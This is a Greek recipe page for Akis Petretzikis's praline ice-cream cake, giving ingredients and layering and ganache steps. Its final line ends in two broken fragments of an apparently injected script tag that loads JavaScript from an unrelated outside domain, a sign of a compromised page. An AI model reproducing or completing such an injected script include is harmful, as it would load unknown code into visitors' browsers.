Δευτέρα με γλυκές απολαύσεις! Συνταγή για τούρτα παγωτό με πραλίνα από τον Άκη Πετρετζίκη

600324_497909936947050_1362992388_n-1-619x359

Η πιο θεϊκή τούρτα για να ξεκινήσει καλά η εβδομάδα σου! Ο Άκης Πετρετζίκης φτιάχνει μία συναρπαστικά νόστιμη συνταγή, που θα εντυπωσιάσει μικρούς και μεγάλους.

Υλικά

  • 500 γραμμ. γάλα 3,5 % λιπαρά, χλιαρό
  • 500 γραμμ. κρέμα γάλακτος 35% λιπαρά, παγωμένη
  • 1,2 κιλά πραλίνα φουντουκιού
  • 300 γραμμ. φουντούκια καβουρδισμένα
  • 2 μικρά κέικ εμπορίου 2×400 γραμμ.

Για τη γκανάζ σοκολάτας

  • 200 γραμμ. κρέμα γάλακτος
  • 200 γραμμ. κουβερτούρα

Διαδικασία

Κόβουμε τα κέικ σε λεπτές κάθετες φέτες. Χρησιμοποιούμε, αν βρούμε, ανάμεικτο κέικ για πιο όμορφα χρωματικά εφέ και αφήνουμε στην άκρη. Παίρνουμε ένα βαθύ μπολ διαμέτρου 30 εκ. και το καλύπτουμε καλά όλο με 3 στρώσεις από μεμβράνη για να μην υπάρχει κενό και για να μην κολλήσει το παγωτό μας και αφήνουμε στην άκρη.

Βάζουμε το γάλα σε ένα βαθύ μπολ και το ζεσταίνουμε για 1 λεπτό στα μικροκύματα στα 800 watt. Το γάλα πρέπει να είναι χλιαρό.  Στον κάδο ενός ηλεκτρικού μίξερ χτυπάμε την παγωμένη κρέμα γάλακτος μέχρι να αποκτήσει ελαφριά μορφή γιαουρτιού, μέχρι να γίνει σαντιγί. Αδειάζουμε τη σαντιγί σε ένα μπολ με μία πλαστική σπάτουλα.

Στον κάδο που χτυπήσαμε τη σαντιγί, ρίχνουμε τα 2/3 της πραλίνας και το ζεστό γάλα. Χτυπάμε σε σιγανή ταχύτητα μέχρι το μείγμα να γίνει ομοιογενές. Αν το μείγμα σε αυτό το σημείο είναι ζεστό, βάζουμε το μπολ για 1 ώρα στο ψυγείο για να κρυώσει.

Αν είναι σε θερμοκρασία δωματίου, τότε ρίχνουμε τη σαντιγί στο μπολ με την πραλίνα και ανακατεύουμε απαλά με την σπάτουλα μέχρι να ομογενοποιηθεί. Σε αυτό το σημείο, αν βάλουμε το μείγμα στην κατάψυξη θα πάρουμε ένα πολύ ωραίο παγωτό πραλίνα!

Βάζουμε τα φουντούκια ολόκληρα σε ένα ταψάκι σε προθερμασμένο φούρνο στους 180 βαθμούς και τα καβουρδίζουμε μέχρι να πάρουν χρώμα για 10-15 λεπτά. Στρώνουμε όλη την επιφάνεια του μπολ με την μεμβράνη φέτες από τα κέικ.

Ρίχνουμε μερικές κουταλιές σκέτη πραλίνα, σε διάφορα σημεία, πάνω στο κέικ. Από πάνω βάζουμε λίγα φουντούκια και ρίχνουμε το 1/3 από το μείγμα με τη σαντιγί. Πάνω του βάζουμε μερικά κομμάτια κέικ ακόμα. Ρίχνουμε μερικά ακόμα από τα φουντούκια και συνεχίζουμε με το άλλο 1/3 από την κρέμα.

Συνεχίζουμε μέχρι να τελειώσουμε με τα υλικά μας αλλά πρέπει να μας μείνει κέικ για να βάλουμε πάνω πάνω στην τούρτα για να γίνει η βάση, όταν τη γυρίσουμε ανάποδα. Κλείνουμε με μεμβράνη, πατάμε καλά να φύγει ο παραπανίσιος αέρας και αποθηκεύουμε στην κατάψυξη μέχρι να παγώσει καλά.

Βάζουμε την κρέμα γάλακτος με τη σοκολάτα σε ένα μπολάκι με μεμβράνη για 1,5 λεπτό στα μικροκύματα στα 800 watt. Ανακατεύουμε με ένα κουτάλι μέχρι να ομογενοποιηθούν.  Περιχύνουμε την τούρτα μας σιγά σιγά και πασπαλίζουμε με φουντούκια.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>